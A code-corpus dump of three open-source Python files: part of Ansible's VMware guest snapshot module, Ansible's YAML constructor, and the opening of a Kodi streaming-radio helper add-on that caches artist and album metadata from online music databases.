- ' folder: /datacenter1/vm/folder1'
- ' folder: datacenter1/vm/folder1'
- ' folder: /folder1/datacenter1/vm'
- ' folder: folder1/datacenter1/vm'
- ' folder: /folder1/datacenter1/vm/folder2'
- ' folder: vm/folder2'
- ' folder: folder2'
datacenter:
description:
- Destination datacenter for the deploy operation.
required: True
snapshot_name:
description:
- Sets the snapshot name to manage.
- This param is required only if state is not C(remove_all)
description:
description:
- Define an arbitrary description to attach to snapshot.
default: ''
quiesce:
description:
- If set to C(true) and virtual machine is powered on, it will quiesce the file system in virtual machine.
- Note that VMWare Tools are required for this flag.
- If virtual machine is powered off or VMware Tools are not available, then this flag is set to C(false).
- If virtual machine does not provide capability to take quiesce snapshot, then this flag is set to C(false).
required: False
version_added: "2.4"
type: bool
default: False
memory_dump:
description:
- If set to C(true), memory dump of virtual machine is also included in snapshot.
- Note that memory snapshots take time and resources, this will take longer time to create.
- If virtual machine does not provide capability to take memory snapshot, then this flag is set to C(false).
required: False
version_added: "2.4"
type: bool
default: False
remove_children:
description:
- If set to C(true) and state is set to C(absent), then entire snapshot subtree is set for removal.
required: False
version_added: "2.4"
type: bool
default: False
new_snapshot_name:
description:
- Value to rename the existing snapshot to.
version_added: "2.5"
new_description:
description:
- Value to change the description of an existing snapshot to.
version_added: "2.5"
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
- name: Create a snapshot
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: present
snapshot_name: snap1
description: snap1_description
delegate_to: localhost
- name: Remove a snapshot
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: absent
snapshot_name: snap1
delegate_to: localhost
- name: Revert to a snapshot
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: revert
snapshot_name: snap1
delegate_to: localhost
- name: Remove all snapshots of a VM
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: remove_all
delegate_to: localhost
- name: Take snapshot of a VM using quiesce and memory flag on
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: present
snapshot_name: dummy_vm_snap_0001
quiesce: yes
memory_dump: yes
delegate_to: localhost
- name: Remove a snapshot and snapshot subtree
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: absent
remove_children: yes
snapshot_name: snap1
delegate_to: localhost
- name: Rename a snapshot
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: present
snapshot_name: current_snap_name
new_snapshot_name: im_renamed
new_description: "{{ new_snapshot_description }}"
delegate_to: localhost
'''
RETURN = """
snapshot_results:
description: metadata about the virtual machine snapshots
returned: always
type: dict
sample: {
"current_snapshot": {
"creation_time": "2019-04-09T14:40:26.617427+00:00",
"description": "Snapshot 4 example",
"id": 4,
"name": "snapshot4",
"state": "poweredOff"
},
"snapshots": [
{
"creation_time": "2019-04-09T14:38:24.667543+00:00",
"description": "Snapshot 3 example",
"id": 3,
"name": "snapshot3",
"state": "poweredOff"
},
{
"creation_time": "2019-04-09T14:40:26.617427+00:00",
"description": "Snapshot 4 example",
"id": 4,
"name": "snapshot4",
"state": "poweredOff"
}
]
}
"""
import time
try:
from pyVmomi import vim
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
from ansible.module_utils.vmware import PyVmomi, list_snapshots, vmware_argument_spec
class PyVmomiHelper(PyVmomi):
def __init__(self, module):
super(PyVmomiHelper, self).__init__(module)
@staticmethod
def wait_for_task(task):
# https://www.vmware.com/support/developer/vc-sdk/visdk25pubs/ReferenceGuide/vim.Task.html
# https://www.vmware.com/support/developer/vc-sdk/visdk25pubs/ReferenceGuide/vim.TaskInfo.html
# https://github.com/virtdevninja/pyvmomi-community-samples/blob/master/samples/tools/tasks.py
while task.info.state not in ['success', 'error']:
time.sleep(1)
def get_snapshots_by_name_recursively(self, snapshots, snapname):
snap_obj = []
for snapshot in snapshots:
if snapshot.name == snapname:
snap_obj.append(snapshot)
else:
snap_obj = snap_obj + self.get_snapshots_by_name_recursively(snapshot.childSnapshotList, snapname)
return snap_obj
def snapshot_vm(self, vm):
memory_dump = False
quiesce = False
# Check if there is a latest snapshot already present as specified by user
if vm.snapshot is not None:
snap_obj = self.get_snapshots_by_name_recursively(vm.snapshot.rootSnapshotList,
self.module.params["snapshot_name"])
if snap_obj:
# Snapshot already exists, do not anything.
self.module.exit_json(changed=False,
msg="Snapshot named [%(snapshot_name)s] already exists and is current." % self.module.params)
# Check if Virtual Machine provides capabilities for Quiesce and Memory Snapshots
if vm.capability.quiescedSnapshotsSupported:
quiesce = self.module.params['quiesce']
if vm.capability.memorySnapshotsSupported:
memory_dump = self.module.params['memory_dump']
task = None
try:
task = vm.CreateSnapshot(self.module.params["snapshot_name"],
self.module.params["description"],
memory_dump,
quiesce)
except vim.fault.RestrictedVersion as exc:
self.module.fail_json(msg="Failed to take snapshot due to VMware Licence"
" restriction : %s" % to_native(exc.msg))
except Exception as exc:
self.module.fail_json(msg="Failed to create snapshot of virtual machine"
" %s due to %s" % (self.module.params['name'], to_native(exc)))
return task
def rename_snapshot(self, vm):
if vm.snapshot is None:
self.module.fail_json(msg="virtual machine - %s doesn't have any"
" snapshots" % (self.module.params.get('uuid') or self.module.params.get('name')))
snap_obj = self.get_snapshots_by_name_recursively(vm.snapshot.rootSnapshotList,
self.module.params["snapshot_name"])
task = None
if len(snap_obj) == 1:
snap_obj = snap_obj[0].snapshot
if self.module.params["new_snapshot_name"] and self.module.params["new_description"]:
task = snap_obj.RenameSnapshot(name=self.module.params["new_snapshot_name"],
description=self.module.params["new_description"])
elif self.module.params["new_snapshot_name"]:
task = snap_obj.RenameSnapshot(name=self.module.params["new_snapshot_name"])
else:
task = snap_obj.RenameSnapshot(description=self.module.params["new_description"])
else:
self.module.exit_json(
msg="Couldn't find any snapshots with specified name: %s on VM: %s" %
(self.module.params["snapshot_name"],
self.module.params.get('uuid') or self.module.params.get('name')))
return task
def remove_or_revert_snapshot(self, vm):
if vm.snapshot is None:
vm_name = (self.module.params.get('uuid') or self.module.params.get('name'))
if self.module.params.get('state') == 'revert':
self.module.fail_json(msg="virtual machine - %s does not"
" have any snapshots to revert to." % vm_name)
self.module.exit_json(msg="virtual machine - %s doesn't have any"
" snapshots to remove." % vm_name)
snap_obj = self.get_snapshots_by_name_recursively(vm.snapshot.rootSnapshotList,
self.module.params["snapshot_name"])
task = None
if len(snap_obj) == 1:
snap_obj = snap_obj[0].snapshot
if self.module.params["state"] == "absent":
# Remove subtree depending upon the user input
remove_children = self.module.params.get('remove_children', False)
task = snap_obj.RemoveSnapshot_Task(remove_children)
elif self.module.params["state"] == "revert":
task = snap_obj.RevertToSnapshot_Task()
else:
self.module.exit_json(msg="Couldn't find any snapshots with"
" specified name: %s on VM: %s" % (self.module.params["snapshot_name"],
self.module.params.get('uuid') or self.module.params.get('name')))
return task
def apply_snapshot_op(self, vm):
result = {}
if self.module.params["state"] == "present":
if self.module.params["new_snapshot_name"] or self.module.params["new_description"]:
self.rename_snapshot(vm)
result = {'changed': True, 'failed': False, 'renamed': True}
task = None
else:
task = self.snapshot_vm(vm)
elif self.module.params["state"] in ["absent", "revert"]:
task = self.remove_or_revert_snapshot(vm)
elif self.module.params["state"] == "remove_all":
task = vm.RemoveAllSnapshots()
else:
# This should not happen
raise AssertionError()
if task:
self.wait_for_task(task)
if task.info.state == 'error':
result = {'changed': False, 'failed': True, 'msg': task.info.error.msg}
else:
result = {'changed': True, 'failed': False, 'snapshot_results': list_snapshots(vm)}
return result
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
state=dict(default='present', choices=['present', 'absent', 'revert', 'remove_all']),
name=dict(type='str'),
name_match=dict(type='str', choices=['first', 'last'], default='first'),
uuid=dict(type='str'),
use_instance_uuid=dict(type='bool', default=False),
folder=dict(type='str'),
datacenter=dict(required=True, type='str'),
snapshot_name=dict(type='str'),
description=dict(type='str', default=''),
quiesce=dict(type='bool', default=False),
memory_dump=dict(type='bool', default=False),
remove_children=dict(type='bool', default=False),
new_snapshot_name=dict(type='str'),
new_description=dict(type='str'),
)
module = AnsibleModule(argument_spec=argument_spec,
required_together=[['name', 'folder']],
required_one_of=[['name', 'uuid']],
)
if module.params['folder']:
# FindByInventoryPath() does not require an absolute path
# so we should leave the input folder path unmodified
module.params['folder'] = module.params['folder'].rstrip('/')
pyv = PyVmomiHelper(module)
# Check if the VM exists before continuing
vm = pyv.get_vm()
if not vm:
# If UUID is set, getvm select UUID, show error message accordingly.
module.fail_json(msg="Unable to manage snapshots for non-existing VM %s" % (module.params.get('uuid') or
module.params.get('name')))
if not module.params['snapshot_name'] and module.params['state'] != 'remove_all':
module.fail_json(msg="snapshot_name param is required when state is '%(state)s'" % module.params)
result = pyv.apply_snapshot_op(vm)
if 'failed' not in result:
result['failed'] = False
if result['failed']:
module.fail_json(**result)
else:
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
stevekuznetsov/ansible | lib/ansible/parsing/yaml/constructor.py | 10 | 5927 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from yaml.constructor import SafeConstructor, ConstructorError
from yaml.nodes import MappingNode
from ansible.module_utils._text import to_bytes
from ansible.parsing.vault import VaultLib
from ansible.parsing.yaml.objects import AnsibleMapping, AnsibleSequence, AnsibleUnicode
from ansible.parsing.yaml.objects import AnsibleVaultEncryptedUnicode
from ansible.vars.unsafe_proxy import wrap_var
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class AnsibleConstructor(SafeConstructor):
def __init__(self, file_name=None, vault_password=None):
self._vault_password = vault_password
self._ansible_file_name = file_name
super(AnsibleConstructor, self).__init__()
self._vaults = {}
self._vaults['default'] = VaultLib(password=self._vault_password)
def construct_yaml_map(self, node):
data = AnsibleMapping()
yield data
value = self.construct_mapping(node)
data.update(value)
data.ansible_pos = self._node_position_info(node)
def construct_mapping(self, node, deep=False):
# Most of this is from yaml.constructor.SafeConstructor. We replicate
# it here so that we can warn users when they have duplicate dict keys
# (pyyaml silently allows overwriting keys)
if not isinstance(node, MappingNode):
raise ConstructorError(None, None,
"expected a mapping node, but found %s" % node.id,
node.start_mark)
self.flatten_mapping(node)
mapping = AnsibleMapping()
# Add our extra information to the returned value
mapping.ansible_pos = self._node_position_info(node)
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=deep)
try:
hash(key)
except TypeError as exc:
raise ConstructorError("while constructing a mapping", node.start_mark,
"found unacceptable key (%s)" % exc, key_node.start_mark)
if key in mapping:
display.warning(u'While constructing a mapping from {1}, line {2}, column {3}, found a duplicate dict key ({0}).'
u' Using last defined value only.'.format(key, *mapping.ansible_pos))
value = self.construct_object(value_node, deep=deep)
mapping[key] = value
return mapping
def construct_yaml_str(self, node, unsafe=False):
# Override the default string handling function
# to always return unicode objects
value = self.construct_scalar(node)
ret = AnsibleUnicode(value)
ret.ansible_pos = self._node_position_info(node)
if unsafe:
ret = wrap_var(ret)
return ret
def construct_vault_encrypted_unicode(self, node):
value = self.construct_scalar(node)
ciphertext_data = to_bytes(value)
if self._vault_password is None:
raise ConstructorError(None, None,
"found vault but no vault password provided", node.start_mark)
# could pass in a key id here to choose the vault to associate with
vault = self._vaults['default']
ret = AnsibleVaultEncryptedUnicode(ciphertext_data)
ret.vault = vault
return ret
def construct_yaml_seq(self, node):
data = AnsibleSequence()
yield data
data.extend(self.construct_sequence(node))
data.ansible_pos = self._node_position_info(node)
def construct_yaml_unsafe(self, node):
return self.construct_yaml_str(node, unsafe=True)
def _node_position_info(self, node):
# the line number where the previous token has ended (plus empty lines)
# Add one so that the first line is line 1 rather than line 0
column = node.start_mark.column + 1
line = node.start_mark.line + 1
# in some cases, we may have pre-read the data and then
# passed it to the load() call for YAML, in which case we
# want to override the default datasource (which would be
# '<string>') to the actual filename we read in
datasource = self._ansible_file_name or node.start_mark.name
return (datasource, line, column)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:map',
AnsibleConstructor.construct_yaml_map)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:python/dict',
AnsibleConstructor.construct_yaml_map)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:str',
AnsibleConstructor.construct_yaml_str)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:python/unicode',
AnsibleConstructor.construct_yaml_str)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:seq',
AnsibleConstructor.construct_yaml_seq)
AnsibleConstructor.add_constructor(
u'!unsafe',
AnsibleConstructor.construct_yaml_unsafe)
AnsibleConstructor.add_constructor(u'!vault', AnsibleConstructor.construct_vault_encrypted_unicode)
| gpl-3.0 |
the-black-eagle/script.radio.streaming.helper | resources/lib/utils.py | 1 | 50411 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# (C) Black_eagle 2016 - 2019
#
import xbmc, xbmcvfs, xbmcaddon
import xbmcgui
import urllib, urllib2, re
import uuid
import sys, traceback
from resources.lib.audiodb import audiodbinfo as settings
from resources.lib.audiodb import lastfminfo as lfmsettings
import pickle
import datetime
if sys.version_info >= (2, 7):
import json as _json
else:
import simplejson as _json
from threading import Timer
rusty_gate = settings.rusty_gate
happy_hippo = lfmsettings.happy_hippo
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
addonversion = addon.getAddonInfo('version')
addonpath = addon.getAddonInfo('path').decode('utf-8')
addonid = addon.getAddonInfo('id').decode('utf-8')
language = addon.getLocalizedString
# Global variables
BaseString = addon.getSetting('musicdirectory') # Base directory for Music albums
logostring = xbmc.translatePath('special://profile/addon_data/' + addonid + '/').decode('utf-8') # Base directory to store downloaded logos
logfile = xbmc.translatePath('special://temp/srh.log').decode('utf-8')
pathToAlbumCover = None
albumtitle = ""
keydata = None
tadb_albumid = None
RealAlbumThumb = None
RealCDArt = None
AlbumDescription = None
AlbumReview = None
was_playing = ""
local_logo = False
got_info = 0
lastfm_first_time = 0
lastfm_delay = 5
use_lastfm = False
lastfm_username = ''
albumtitle = None
counts = {}
if addon.getSetting('centralcache') == 'true':
logostring = addon.getSetting('cachepath')
dict1 = {} # Key = artistname+trackname, value = Album name
dict2 = {} # Key = artistname+trackname, value = Album year
dict3 = {} # Key = artistname+trackname, value = date last looked up
dict4 = {} # Key = Artist Name, Value = URL to artist thumb
dict5 = {} # Key = Artist Name, Value = URL to artist banner
dict6 = {} # Key = artist Name, value = MBID
dict7 = {} # Key = Artistname+trackname, value = Track details
dict8 = {} # Key = Albumname, value = recordlabel
dict9 = {} # Key = Albumname, value = album thumb
dict10 = {} # Key = Albumname, value - CD thumb
dict11 = {} # key = Albumname, value = Album description
dict12 = {} # Key = Albumname, value = Album review
time_diff = datetime.timedelta(days=7) # date to next check
todays_date = datetime.datetime.combine(datetime.date.today(), datetime.datetime.min.time())
BaseString = xbmc.validatePath(BaseString)
featured_artist_match = ['ft.','Ft.','Feat.','feat.',' / ','vs.','Vs.','ft','Ft','Feat','feat']
onlinelookup = addon.getSetting('onlinelookup')
fanart = addon.getSetting('usefanarttv')
tadb = addon.getSetting('usetadb')
replacelist={addon.getSetting('st1find').strip(): addon.getSetting('st1rep').strip(), \
addon.getSetting('st2find').strip(): addon.getSetting('st2rep').strip(), \
addon.getSetting('st3find').strip(): addon.getSetting('st3rep').strip(), \
addon.getSetting('st4find').strip(): addon.getSetting('st4rep').strip(), \
addon.getSetting('st5find').strip(): addon.getSetting('st5rep').strip(), \
addon.getSetting('st6find').strip(): addon.getSetting('st6rep').strip(), \
addon.getSetting('st7find').strip(): addon.getSetting('st7rep').strip(), \
addon.getSetting('st8find').strip(): addon.getSetting('st8rep').strip(), \
addon.getSetting('st9find').strip(): addon.getSetting('st9rep').strip(), \
addon.getSetting('st10find').strip(): addon.getSetting('st10rep').strip()}
# st1rep = station name (as repaced)
swaplist = {addon.getSetting('st1rep').strip(): addon.getSetting('rev1'), \
addon.getSetting('st2rep').strip(): addon.getSetting('rev2'), \
addon.getSetting('st3rep').strip(): addon.getSetting('rev3'), \
addon.getSetting('st4rep').strip(): addon.getSetting('rev4'), \
addon.getSetting('st5rep').strip(): addon.getSetting('rev5'), \
addon.getSetting('st6rep').strip(): addon.getSetting('rev6'), \
addon.getSetting('st7rep').strip(): addon.getSetting('rev7'), \
addon.getSetting('st8rep').strip(): addon.getSetting('rev8'), \
addon.getSetting('st9rep').strip(): addon.getSetting('rev9'), \
addon.getSetting('st10rep').strip(): addon.getSetting('rev10')}
use_lastfm_setting = {addon.getSetting('st1rep').strip(): addon.getSetting('scrobble1'), \
addon.getSetting('st2rep').strip(): addon.getSetting('scrobble2'), \
addon.getSetting('st3rep').strip(): addon.getSetting('scrobble3'), \
addon.getSetting('st4rep').strip(): addon.getSetting('scrobble4'), \
addon.getSetting('st5rep').strip(): addon.getSetting('scrobble5'), \
addon.getSetting('st6rep').strip(): addon.getSetting('scrobble6'), \
addon.getSetting('st7rep').strip(): addon.getSetting('scrobble7'), \
addon.getSetting('st8rep').strip(): addon.getSetting('scrobble8'), \
addon.getSetting('st9rep').strip(): addon.getSetting('scrobble9'), \
addon.getSetting('st10rep').strip(): addon.getSetting('scrobble10')}
lastfm_usernames = {addon.getSetting('st1rep').strip(): addon.getSetting('url1'), \
addon.getSetting('st2rep').strip(): addon.getSetting('url2'), \
addon.getSetting('st3rep').strip(): addon.getSetting('url3'), \
addon.getSetting('st4rep').strip(): addon.getSetting('url4'), \
addon.getSetting('st5rep').strip(): addon.getSetting('url5'), \
addon.getSetting('st6rep').strip(): addon.getSetting('url6'), \
addon.getSetting('st7rep').strip(): addon.getSetting('url7'), \
addon.getSetting('st8rep').strip(): addon.getSetting('url8'), \
addon.getSetting('st9rep').strip(): addon.getSetting('url9'), \
addon.getSetting('st10rep').strip(): addon.getSetting('url10')}
replace1 = addon.getSetting('remove1').decode('utf-8')
replace2 = addon.getSetting('remove2').decode('utf-8')
replace3 = addon.getSetting('remove3').decode('utf-8')
if addon.getSetting('luma') == 'true':
luma = True
else:
luma = False
firstpass = 0
delay = int(addon.getSetting('delay'))
previous_track = None
already_checked = False
checked_all_artists = False
mbid = None
WINDOW = xbmcgui.Window(12006)
debugging = addon.getSetting('debug')
if debugging == 'true':
debugging = True
else:
debugging = False
def log(txt, mylevel=xbmc.LOGDEBUG):
"""
Logs to Kodi's standard logfile
"""
if debugging:
mylevel = xbmc.LOGNOTICE
if isinstance(txt, str):
txt = txt.decode('utf-8')
message = u'%s : %s' % (addonname, txt)
xbmc.log(msg=message.encode('utf-8'), level=mylevel)
def download_logo(path,url,origin="Fanart.tv"):
logopath = path + "logo.png"
log ("Download logo [%s] " % logopath)
imagedata = urllib.urlopen(url).read()
f = open(logopath, 'wb')
f.write(imagedata)
f.close()
log("Downloaded logo from %s" % origin, xbmc.LOGDEBUG)
return logopath
def load_artist_subs():
artist_subs_string = addon.getSetting('artistsubs')
temp_list = artist_subs_string.split( ',' )
artist_sub_dict = dict(s.split('=') for s in temp_list)
return artist_sub_dict
def clean_string(text):
text = re.sub('<a [^>]*>|</a>|<span[^>]*>|</span>', '', text)
text = re.sub('"', '"', text)
text = re.sub('&', '&', text)
text = re.sub('>', '>', text)
text = re.sub('<', '<', text)
text = re.sub('User-contributed text is available under the Creative Commons By-SA License; additional terms may apply.', '', text)
text = re.sub('Read more about .* on Last.fm.', '', text)
text = re.sub('Read more on Last.fm.', '', text)
return text
def load_pickle():
"""
Loads cache data from file in the addon_data directory of the script
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'load_pickle' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
log("Loading data from pickle file")
pfile = open(logostring + 'data.pickle',"rb")
d1 = pickle.load(pfile)
d2 = pickle.load(pfile)
d3 = pickle.load(pfile)
try:
d4 = pickle.load(pfile)
d5 = pickle.load(pfile)
except:
d4 = {}
d5 = {}
log("Pickle data for thumb and banner art didn't exist. Creating new dictionaries")
try:
d6 = pickle.load(pfile)
except:
d6 = {}
log("created new pickle data for MBID storage")
try:
d7 = pickle.load(pfile)
except:
d7 = {}
log("Created new pickle data for track information")
try:
d8 = pickle.load(pfile)
d9 = pickle.load(pfile)
d10 = pickle.load(pfile)
d11 = pickle.load(pfile)
d12 = pickle.load(pfile)
except:
d8 = {}
d9 = {}
d10 = {}
d11 = {}
d12 = {}
log("New pickle data created for album information")
pfile.close()
return d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12
def save_pickle(d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, counts):
"""
Saves local cache data to file in the addon_data directory of the script
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'save_pickle' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
log("Saving data to pickle file")
counts['no_of_tracks'] += len(d7)
pfile = open(logostring + 'data.pickle',"wb")
pickle.dump(d1, pfile)
pickle.dump(d2, pfile)
pickle.dump(d3, pfile)
pickle.dump(d4, pfile)
pickle.dump(d5, pfile)
pickle.dump(d6, pfile)
pickle.dump(d7, pfile)
pickle.dump(d8, pfile)
pickle.dump(d9, pfile)
pickle.dump(d10, pfile)
pickle.dump(d11, pfile)
pickle.dump(d12, pfile)
pfile.close()
def load_url(url):
try:
response = urllib.urlopen(url).read().decode('utf-8')
if response is None:
response = "!DOCTYPE"
return response
except IOError as e:
if hasattr(e,'reason'):
log("Failed to reach server with url [%s]" % url, xbmc.LOGERROR)
log("Error returned was [%s]" %e.reason, xbmc.LOGERROR)
elif hasattr(e,'code'):
log("Error getting url [%s] Error code was [%s]" % ( url, e.code ) , xbmc.LOGERROR)
return response
def get_local_cover(BaseString, artist, track, albumtitle):
pathToCDArt = ""
try:
if albumtitle:
pathToCDArt = xbmc.validatePath(BaseString + artist + "/" + albumtitle + "/cdart.png" )
if not xbmcvfs.exists( pathToCDArt ):
pathToCDArt = ""
pathToAlbumCover = xbmc.validatePath(BaseString + artist + "/" + albumtitle + "/cover.png")
log("Looking for an album cover in %s" % pathToAlbumCover, xbmc.LOGDEBUG)
if xbmcvfs.exists(pathToAlbumCover):
log("Found a local 'cover.png' and set AlbumCover to [%s]" % pathToAlbumCover, xbmc.LOGDEBUG)
return 1, pathToAlbumCover, pathToCDArt
pathToAlbumCover = xbmc.validatePath(BaseString + artist + "/" + albumtitle + "/folder.jpg")
log("Looking for an album cover in %s" % pathToAlbumCover, xbmc.LOGDEBUG)
if xbmcvfs.exists(pathToAlbumCover):
log("Found a local 'folder.jpg' and set AlbumCover to [%s]" % pathToAlbumCover, xbmc.LOGDEBUG)
return 1, pathToAlbumCover, pathToCDArt
pathToAlbumCover = xbmc.validatePath(BaseString + artist + "/" + track + "/folder.jpg")
pathToCDArt = xbmc.validatePath(BaseString + artist + "/" + track + "/cdart.png" )
if not xbmcvfs.exists( pathToCDArt ):
pathToCDArt = ""
if xbmcvfs.exists(pathToAlbumCover):
log("Found a local 'folder.jpg' and set AlbumCover to [%s]" % pathToAlbumCover, xbmc.LOGDEBUG)
return 1, pathToAlbumCover, pathToCDArt
pathToAlbumCover = xbmc.validatePath(BaseString + artist + "/" + track + "/cover.png")
log("Looking for an album cover in %s (last attempt before using thumbnail)" % pathToAlbumCover, xbmc.LOGDEBUG)
if xbmcvfs.exists(pathToAlbumCover):
log("Found a local 'cover.png' and set AlbumCover to [%s]" % pathToAlbumCover, xbmc.LOGDEBUG)
return 1, pathToAlbumCover, pathToCDArt
if artist in dict4:
return 2, dict4[artist], None
return 0, None, None
except Exception as e:
log("Got an error trying to look for a cover!! [%s]" % str(e), xbmc.LOGERROR)
pass
return None
def check_station(file_playing):
"""Attempts to parse a URL to find the name of the station being played
and performs substitutions to 'pretty up' the name if those options
are set in the settings
NOTE - Kodi v18 doesn't return the url of the station, instead it rturns either
the name of the file <containing> the url or a station ID if using the rad.io addon
"""
station_list = ''
try:
if 'icy-' in file_playing: # looking at an ICY stream
x = file_playing.rfind('/')
station_list = file_playing[x + 1:]
if ('.' in station_list) and ("http" not in station_list):
station, ending = station_list.split('.')
elif '|' in file_playing:
y = file_playing.rfind('|')
station_list = file_playing[:y]
x = station_list.rfind('/')
station = station_list[x + 1:]
else:
if 'http://' in file_playing:
station_list = file_playing.strip('http://')
if 'https://' in file_playing:
station_list = file_playing.strip('https://')
if 'smb://' in file_playing:
station_list = file_playing.strip('smb://')
x = station_list.rfind(':')
if x != -1:
station = station_list[:x]
else:
station = station_list
if not station_list: # If this is empty we haven't found anything to use as a station name yet
if 'm3u' in file_playing: # Sometimes kodi makes a playlist of one streaming channel so check for this
station_list = file_playing.replace( '.m3u', '')
else:
station_list = file_playing # just use whatever we have (rad.io addon filename will be the ID of the station (11524 for planet rock)
try:
station = next(v for k, v in replacelist.items()
if k in (station_list))
log("Station is [%s], station_list is [%s]" %(station, station_list), xbmc.LOGDEBUG)
return station, station_list
except StopIteration:
return station, station_list
except Exception as e:
log("Error trying to parse station name [ %s ]" % str(
e), xbmc.LOGERROR)
return 'Online Radio', file_playing
def get_album_data(artist, track, albumtitle, dict8, dict9, dict10, dict11, dict12, RealCDArt, RealAlbumThumb, AlbumDescription, AlbumReview):
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'get_album_data' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
tadb_url = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
tadb_url = tadb_url + '/searchalbum.php?s=%s&a=%s' % (artist.encode('utf-8'), albumtitle.encode('utf-8'))
log(tadb_url)
albumkeydata = albumtitle.replace(' ', '').lower()
num = len(dict8)
log("%d albums in cache" % num)
try:
datechecked = dict3[keydata]
except:
datechecked = (todays_date - time_diff)
pass
if albumkeydata in dict8:
log("Seen this album before")
if not ((datechecked < (todays_date - time_diff)) or (xbmcvfs.exists(logostring + "refreshdata"))): # might need to look up data again
WINDOW.setProperty("srh.RecordLabel", dict8[albumkeydata])
RealAlbumThumb = dict9[albumkeydata]
RealCDArt = dict10[albumkeydata]
AlbumDescription = dict11[albumkeydata]
AlbumReview = dict12[albumkeydata]
if RealAlbumThumb:
log("real album thumb found! path is %s" % RealAlbumThumb)
if RealCDArt:
log("Real cd art found! path is %s" % RealCDArt)
return RealAlbumThumb, RealCDArt, AlbumDescription, AlbumReview
else:
log("Refreshing album data (treating as new album)")
else: # Album not in cache yet.
log("New album - looking up data")
try:
response = urllib.urlopen(tadb_url).read().decode('utf-8')
if response:
tadb_album_data = _json.loads(response)
else:
dict8[albumkeydata] = None
dict9[albumkeydata] = None
dict10[albumkeydata] = None
dict11[albumkeydata] = None
dict12[albumkeydata] = None
log("No response from tadb", xbmc.LOGERROR)
return None, None, None, None
except:
log("Error trying to get album data", xbmc.LOGERROR)
pass
try:
RecordLabel = tadb_album_data['album'][0]['strLabel']
dict8[albumkeydata] = RecordLabel
except Exception as e:
log("Couldn't get required data !!")
log("Error was %s" % str(e))
dict8[albumkeydata] = None
pass
try:
RealAlbumThumb = tadb_album_data['album'][0]['strAlbumThumb']
dict9[albumkeydata] = RealAlbumThumb
except:
RealAlbumThumb = None
dict9[albumkeydata] = None
pass
try:
RealCDArt = tadb_album_data['album'][0]['strAlbumCDart']
dict10[albumkeydata] = RealCDArt
except:
RealCDArt = None
dict10[albumkeydata] = None
pass
try:
AlbumDescription = ['album'][0]['strDescriptionEN']
dict11[albumkeydata] = AlbumDescription.encode( 'utf-8' )
